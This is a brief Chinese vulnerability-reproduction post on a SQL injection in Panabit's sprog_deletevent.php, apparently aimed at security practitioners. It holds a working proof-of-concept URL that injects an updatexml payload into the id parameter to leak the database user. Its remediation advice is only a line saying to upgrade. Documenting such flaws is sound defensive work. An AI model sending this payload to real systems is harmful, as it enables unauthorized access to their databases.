【漏洞复现】Panabit sprog_deletevent.php SQL注入漏洞

2023年12月15日12:25:09评论45 views字数 423阅读1分24秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

北京派网软件有限公司(Panabit)是一家专业提供网络接入、流量管理、安全审计、数据分析等应用场景的软件公司。

官网：

https://www.panabit.com/

漏洞编号：

无

影响范围：

无

复现环境：

PanabitCloudServer 11.1

0X02 漏洞复现

Panabit云管理平台复现成功。

POC：

https://192.168.245.160/Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(user())),0)&cloudip=1

0X03 修复建议

升级至安全版本及其以上！

0X04

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】Panabit sprog_deletevent.php SQL注入漏洞

CVE-2024-1512